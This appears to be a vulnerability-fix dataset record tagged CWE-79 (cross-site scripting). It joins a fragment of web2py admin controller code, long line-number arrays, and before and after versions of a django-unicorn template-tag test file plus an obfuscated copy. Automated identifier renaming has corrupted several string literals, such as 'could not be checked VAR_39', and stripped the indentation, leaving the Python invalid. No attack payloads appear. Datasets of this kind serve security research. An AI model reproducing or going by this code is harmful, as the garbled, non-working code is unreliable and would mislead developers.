    VAR_26 = SQLFORM.factory(Field('emails', 'text'))
    if VAR_26.process().accepted:
        VAR_172 = [x.strip() for x in VAR_26.vars.emails.split('\n') if x.strip()]
        VAR_173 = 0
        for email in VAR_172:
            if not db.auth_user(email=email):
                VAR_173 += db.auth_user.insert(email=email) and 1 or 0
        session.flash = T('%VAR_140 students registered', VAR_173)
        redirect(URL('site'))
    return locals()
def FUNC_54():
VAR_3 = FUNC_5()
if not VAR_19:
session.flash = VAR_117
redirect(URL('site'))
VAR_46 = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if VAR_46.accepted:
try:
VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
VAR_196 = VAR_195.remotes.origin
VAR_196.fetch()
VAR_196.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain VAR_45 could not be checked VAR_39. Check logs for VAR_178.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for VAR_178.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_46=dialog)
def FUNC_55():
VAR_3 = FUNC_5()
if not VAR_19:
session.flash = VAR_117
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
VAR_26.element('input[type=submit]')['_value'] = T('Push')
VAR_26.add_button(T('Cancel'), URL('site'))
VAR_26.process()
if VAR_26.accepted:
try:
VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
VAR_197 = VAR_195.index
VAR_197.add([apath(VAR_122=request) + VAR_3 + '/*'])
VAR_198 = VAR_197.commit(VAR_26.vars.changelog)
VAR_196 = VAR_195.remotes.origin
VAR_196.push()
session.flash = T(
"Git VAR_195 updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_26=form)
def VAR_94():
VAR_3 = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
VAR_199 = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=VAR_96&search_index=false").read()
session.plugins = loads_json(VAR_199)
except:
VAR_43.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(VAR_94=session.plugins["results"], VAR_3=request.args(0))
def FUNC_57():
VAR_3 = request.args(0)
VAR_116 = request.vars.source
VAR_96 = request.vars.plugin
if not (VAR_116 and VAR_3):
raise HTTP(500, T("Invalid request"))
if not VAR_116.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
VAR_26 = SQLFORM.factory()
VAR_110 = None
if VAR_26.process().accepted:
if "web2py.plugin." in VAR_116:
VAR_5 = "web2py.plugin.%VAR_140.w2p" % \
VAR_116.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
VAR_5 = "web2py.plugin.%VAR_140.w2p" % cleanpath(VAR_96)
if plugin_install(VAR_3, urlopen(VAR_116),
request, VAR_5):
session.flash = T('New VAR_96 VAR_212: %s', VAR_5)
else:
session.flash = \
T('unable to install VAR_96 "%s"', VAR_5)
redirect(URL(VAR_221="plugins", VAR_98=[VAR_3, ]))
return dict(VAR_26=form, VAR_3=VAR_3, VAR_96=FUNC_36, VAR_116=source)
| [
1,
2,
5,
10,
22,
31,
34,
35,
43,
48,
52,
56,
57,
60,
61,
64,
65,
74,
75,
79,
82,
90,
91,
98,
99,
106,
107,
116,
117,
120,
136,
141,
145,
158,
159,
162,
165,
168,
177,
178,
185,
186,
188,
210,
211,
214,
216,
217,
219,
221,
229,
240,
243,
245,
260,
275,
277,
287,
291,
295,
313,
315,
321,
324,
329,
330,
347,
348,
351,
362,
371,
372,
386,
387,
391,
396,
399,
410,
411,
415,
422,
428,
445,
447,
448,
460,
461,
464,
471,
492,
493,
501,
503,
504,
520,
521,
528,
529,
535,
538,
541,
555,
572,
573,
587,
589,
594,
595,
603,
606,
608,
609,
612,
613,
617,
630,
631,
634,
641,
643,
646,
647,
654,
666,
668,
676,
689,
690,
701,
716,
720,
741,
743,
744,
752,
773,
783,
795,
796,
815,
825,
853,
854,
861,
866,
869,
883,
885,
886,
891,
900,
902,
903,
907,
909,
917,
919,
922,
923,
934,
936,
940,
942,
950,
955,
962,
964,
965,
972,
976,
980,
990,
992,
999,
1000,
1002,
1008,
1023,
1024,
1033,
1035,
1038,
1045,
1055,
1060,
1075,
1076,
1080,
1084,
1085,
1089,
1093,
1096,
1110,
1111,
1112,
1117,
1118,
1126,
1127,
1139,
1140,
1149,
1152,
1155,
1156,
1160,
1161,
1165,
1166,
1171,
1172,
1177,
1178,
1179,
1187,
1189,
1196,
1211,
1212,
1218,
1222,
1241,
1242,
1247,
1251,
1252,
1253,
1258,
1259,
1267,
1268,
1280,
1281,
1292,
1295,
1296,
1300,
1301,
1305,
1306,
1311,
1312,
1316,
1317,
1318,
1322,
1326,
1340,
1341,
1358,
1366,
1367,
1368,
1369,
1371,
1372,
1373,
1374,
1375,
1377,
1378,
1379,
1380,
1381,
1384,
1386,
1394,
1399,
1401,
1404,
1407,
1409,
1411,
1414,
1417,
1420,
1424,
1428,
1431,
1445,
1449,
1452,
1455,
1457,
1458,
1460,
1466,
1469,
1472,
1475,
1478,
1494,
1498,
1509,
1510,
1516,
1517,
1522,
1523,
1540,
1541,
1550,
1555,
1558,
1561,
1564,
1567,
1570,
1573,
1576,
1589,
1591,
1592,
1598,
1610,
1613,
1618,
1620,
1635,
1637,
1651,
1654,
1656,
1660,
1665,
1667,
1672,
1690,
1695,
1710,
1713,
1714,
1723,
1725,
1726,
1734,
1750,
1751,
1755,
1760,
1769,
1770,
1773,
1775,
1776,
1778,
1780,
1783,
1788,
1792,
1794,
1796,
1797,
1800,
1803,
1805,
1808,
1810,
1811,
1814,
1818,
1824,
1833,
1834,
1837,
1841,
1857,
1858,
1862,
1863,
1866,
1871,
1872,
1880,
1881,
1886,
1887,
1895,
1896,
1911,
1912,
1913,
1914,
1915,
1916,
1917,
1934,
1951,
1952,
1978,
1979,
1993,
1994,
2001,
2007,
2021,
119,
161,
180,
213,
523,
531,
575,
597,
633,
856,
857,
905,
906,
967,
1026,
1078,
1087,
1214,
1244,
1343,
1543,
1594,
1753,
1772,
1799,
1813,
1836,
1860,
1865,
1883,
1919,
1954,
921,
938,
1802,
1807
] | [
1,
2,
5,
10,
22,
31,
34,
35,
43,
48,
52,
56,
57,
60,
61,
64,
65,
74,
75,
79,
82,
90,
91,
98,
99,
106,
107,
116,
117,
120,
136,
141,
145,
158,
159,
162,
165,
168,
177,
178,
185,
186,
188,
210,
211,
214,
216,
217,
219,
221,
229,
240,
243,
245,
260,
275,
277,
287,
291,
295,
313,
315,
321,
324,
329,
330,
347,
348,
351,
362,
371,
372,
386,
387,
391,
396,
399,
410,
411,
415,
422,
428,
445,
447,
448,
460,
461,
464,
471,
492,
493,
501,
503,
504,
520,
521,
528,
529,
535,
538,
541,
555,
572,
573,
587,
589,
594,
595,
603,
606,
608,
609,
612,
613,
617,
630,
631,
634,
641,
643,
646,
647,
654,
666,
668,
676,
689,
690,
701,
716,
720,
741,
743,
744,
752,
773,
783,
795,
796,
815,
825,
853,
854,
861,
866,
869,
883,
885,
886,
891,
900,
902,
903,
907,
909,
917,
919,
922,
923,
934,
936,
940,
942,
950,
955,
962,
964,
965,
972,
976,
980,
990,
992,
999,
1000,
1002,
1008,
1023,
1024,
1033,
1035,
1038,
1045,
1055,
1060,
1075,
1076,
1080,
1084,
1085,
1089,
1093,
1096,
1110,
1111,
1112,
1117,
1118,
1126,
1127,
1139,
1140,
1149,
1152,
1155,
1156,
1160,
1161,
1165,
1166,
1171,
1172,
1177,
1178,
1179,
1187,
1189,
1196,
1211,
1212,
1218,
1222,
1241,
1242,
1247,
1251,
1252,
1253,
1258,
1259,
1267,
1268,
1280,
1281,
1292,
1295,
1296,
1300,
1301,
1305,
1306,
1311,
1312,
1316,
1317,
1318,
1322,
1326,
1340,
1341,
1358,
1366,
1367,
1368,
1369,
1371,
1372,
1373,
1374,
1375,
1377,
1378,
1379,
1380,
1381,
1384,
1386,
1394,
1399,
1401,
1404,
1407,
1409,
1411,
1414,
1417,
1420,
1424,
1428,
1431,
1445,
1449,
1452,
1455,
1457,
1458,
1460,
1466,
1469,
1472,
1475,
1478,
1494,
1498,
1509,
1510,
1516,
1517,
1522,
1523,
1540,
1541,
1550,
1555,
1558,
1561,
1564,
1567,
1570,
1573,
1576,
1589,
1591,
1592,
1598,
1610,
1613,
1618,
1620,
1635,
1637,
1651,
1654,
1656,
1660,
1665,
1667,
1672,
1690,
1695,
1710,
1713,
1714,
1723,
1725,
1726,
1734,
1750,
1751,
1755,
1760,
1769,
1770,
1773,
1775,
1776,
1778,
1780,
1783,
1788,
1792,
1794,
1796,
1797,
1800,
1803,
1805,
1808,
1810,
1811,
1814,
1818,
1824,
1833,
1834,
1837,
1841,
1857,
1858,
1862,
1863,
1866,
1871,
1872,
1880,
1881,
1886,
1887,
1895,
1896,
1911,
1912,
1913,
1914,
1915,
1916,
1917,
1934,
1951,
1952,
1978,
1979,
1993,
1994,
2001,
2007,
2021,
119,
161,
180,
213,
523,
531,
575,
597,
633,
856,
857,
905,
906,
967,
1026,
1078,
1087,
1214,
1244,
1343,
1543,
1594,
1753,
1772,
1799,
1813,
1836,
1860,
1865,
1883,
1919,
1954,
921,
938,
1802,
1807
] |
1CWE-79
| import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class FakeComponentParent(UnicornView):
template_name = "templates/test_component_parent.html"
class FakeComponentKwargs(UnicornView):
template_name = "templates/test_component_kwargs.html"
hello = "world"
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.hello = kwargs.get("test_kwarg")
class FakeComponentModel(UnicornView):
template_name = "templates/test_component_model.html"
model_id = None
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.model_id = kwargs.get("model_id")
class FakeComponentCalls(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall")
class FakeComponentCalls2(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall2", "hello")
def test_unicorn_render_kwarg():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
unicorn_node = unicorn(None, token)
context = {}
actual = unicorn_node.render(context)
assert "->tested!<-" in actual
def test_unicorn_render_context_variable():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
unicorn_node = unicorn(None, token)
context = {"test_var": {"nested": "variable!"}}
actual = unicorn_node.render(context)
assert "->variable!<-" in actual
def test_unicorn_render_parent(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert unicorn_node.parent
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def test_unicorn_render_parent_with_key(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view key='blob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def test_unicorn_render_parent_with_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view id='flob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def test_unicorn_render_parent_with_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view pk=99",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def test_unicorn_render_parent_with_model_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
# Fake a model that only has an id
class Model:
def __init__(self):
self.id = 178
def to_json(self):
return {"id": self.id}
context = {"view": view, "model": Model()}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def test_unicorn_render_parent_with_model_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
flavor = Flavor(pk=187)
context = {"view": view, "model": flavor}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def test_unicorn_render_id_use_pk():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' model_id=model.id",
)
unicorn_node = unicorn(None, token)
context = {"model": {"pk": 123}}
actual = unicorn_node.render(context)
assert "==123==" in actual
def test_unicorn_render_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_child_component_no_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
html = unicorn_node.render(context)
assert "<script" not in html
def test_unicorn_render_parent_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_calls(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in html
def test_unicorn_render_calls_with_arg(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in html
def test_unicorn_render_calls_no_mount_call(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[]' in html
def test_unicorn_render_hash(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"hash":"' in html
# Assert that the content hash is correct
script_idx = html.index("<script")
rendered_content = html[:script_idx]
expected_hash = generate_checksum(rendered_content)
assert f'"hash":"{expected_hash}"' in html
| import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class FakeComponentParent(UnicornView):
template_name = "templates/test_component_parent.html"
class FakeComponentKwargs(UnicornView):
template_name = "templates/test_component_kwargs.html"
hello = "world"
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.hello = kwargs.get("test_kwarg")
class FakeComponentKwargsWithHtmlEntity(UnicornView):
template_name = "templates/test_component_kwargs_with_html_entity.html"
hello = "world"
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.hello = kwargs.get("test_kwarg")
class FakeComponentModel(UnicornView):
template_name = "templates/test_component_model.html"
model_id = None
def __init__(self, *args, **kwargs):
super().__init__(**kwargs)
self.model_id = kwargs.get("model_id")
class FakeComponentCalls(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall")
class FakeComponentCalls2(UnicornView):
template_name = "templates/test_component_parent.html"
def mount(self):
self.call("testCall2", "hello")
def test_unicorn_render_kwarg():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
unicorn_node = unicorn(None, token)
context = {}
actual = unicorn_node.render(context)
assert "<b>tested!</b>" in actual
def test_unicorn_render_context_variable():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
unicorn_node = unicorn(None, token)
context = {"test_var": {"nested": "variable!"}}
actual = unicorn_node.render(context)
assert "<b>variable!</b>" in actual
def test_unicorn_render_with_invalid_html():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargsWithHtmlEntity' test_kwarg=test_var.nested",
)
unicorn_node = unicorn(None, token)
context = {"test_var": {"nested": "variable!"}}
actual = unicorn_node.render(context)
assert "->variable!<-" in actual
def test_unicorn_render_parent(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert unicorn_node.parent
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def test_unicorn_render_parent_with_key(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view key='blob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def test_unicorn_render_parent_with_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view id='flob'",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def test_unicorn_render_parent_with_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view pk=99",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def test_unicorn_render_parent_with_model_id(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
# Fake a model that only has an id
class Model:
def __init__(self):
self.id = 178
def to_json(self):
return {"id": self.id}
context = {"view": view, "model": Model()}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def test_unicorn_render_parent_with_model_pk(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view model=model",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
flavor = Flavor(pk=187)
context = {"view": view, "model": flavor}
unicorn_node.render(context)
assert (
unicorn_node.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def test_unicorn_render_id_use_pk():
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' model_id=model.id",
)
unicorn_node = unicorn(None, token)
context = {"model": {"pk": 123}}
actual = unicorn_node.render(context)
assert "==123==" in actual
def test_unicorn_render_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_child_component_no_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
unicorn_node = unicorn(None, token)
view = FakeComponentParent(component_name="test", component_id="asdf")
context = {"view": view}
html = unicorn_node.render(context)
assert "<script" not in html
def test_unicorn_render_parent_component_one_script_tag(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
def test_unicorn_render_calls(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in html
def test_unicorn_render_calls_with_arg(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in html
def test_unicorn_render_calls_no_mount_call(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"calls":[]' in html
def test_unicorn_render_hash(settings):
settings.DEBUG = True
token = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
unicorn_node = unicorn(None, token)
context = {}
html = unicorn_node.render(context)
assert '<script type="module"' in html
assert len(re.findall('<script type="module"', html)) == 1
assert '"hash":"' in html
# Assert that the content hash is correct
script_idx = html.index("<script")
rendered_content = html[:script_idx]
expected_hash = generate_checksum(rendered_content)
assert f'"hash":"{expected_hash}"' in html
| xss | {
"code": [
" assert \"->tested!<-\" in actual",
" assert \"->variable!<-\" in actual"
],
"line_no": [
58,
70
]
} | {
"code": [
"class FakeComponentKwargsWithHtmlEntity(UnicornView):",
" template_name = \"templates/test_component_kwargs_with_html_entity.html\"",
" hello = \"world\"",
" def __init__(self, *args, **kwargs):",
" super().__init__(**kwargs)",
" self.hello = kwargs.get(\"test_kwarg\")",
" assert \"<b>tested!</b>\" in actual",
" assert \"<b>variable!</b>\" in actual",
"def test_unicorn_render_with_invalid_html():",
" TokenType.TEXT,",
" \"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargsWithHtmlEntity' test_kwarg=test_var.nested\",",
" )",
" unicorn_node = unicorn(None, token)",
" context = {\"test_var\": {\"nested\": \"variable!\"}}",
" assert \"->variable!<-\" in actual"
],
"line_no": [
26,
27,
28,
30,
31,
32,
67,
79,
82,
84,
85,
86,
87,
88,
91
]
} | import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class CLASS_0(UnicornView):
VAR_1 = "templates/test_component_parent.html"
class CLASS_1(UnicornView):
VAR_1 = "templates/test_component_kwargs.html"
VAR_2 = "world"
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.hello = VAR_4.get("test_kwarg")
class CLASS_2(UnicornView):
VAR_1 = "templates/test_component_model.html"
VAR_5 = None
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.model_id = VAR_4.get("model_id")
class CLASS_3(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_16(self):
self.call("testCall")
class CLASS_4(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_16(self):
self.call("testCall2", "hello")
def FUNC_0():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_9 = VAR_7.render(VAR_8)
assert "->tested!<-" in VAR_9
def FUNC_1():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"test_var": {"nested": "variable!"}}
VAR_9 = VAR_7.render(VAR_8)
assert "->variable!<-" in VAR_9
def FUNC_2(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert VAR_7.parent
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def FUNC_3(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 key='blob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def FUNC_4(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 id='flob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def FUNC_5(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 pk=99",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def FUNC_6(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
class CLASS_5:
def __init__(self):
self.id = 178
def FUNC_17(self):
return {"id": self.id}
VAR_8 = {"view": VAR_10, "model": CLASS_5()}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def FUNC_7(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_11 = Flavor(pk=187)
VAR_8 = {"view": VAR_10, "model": VAR_11}
VAR_7.render(VAR_8)
assert (
